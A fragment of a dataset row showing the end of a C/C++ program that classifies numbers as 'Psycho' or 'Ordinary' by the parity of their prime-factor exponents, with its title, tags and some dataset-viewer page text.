= n/i; v++; } if (v % 2 == 0) ev++; else od++; v = 0; } } if (ev > od) { printf(%s \n,Psycho Number); } else { printf(%s \n, Ordinary Number); } }} | Psycho and ordinary numbers | c++;performance;primes;complexity;sieve of eratosthenes | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.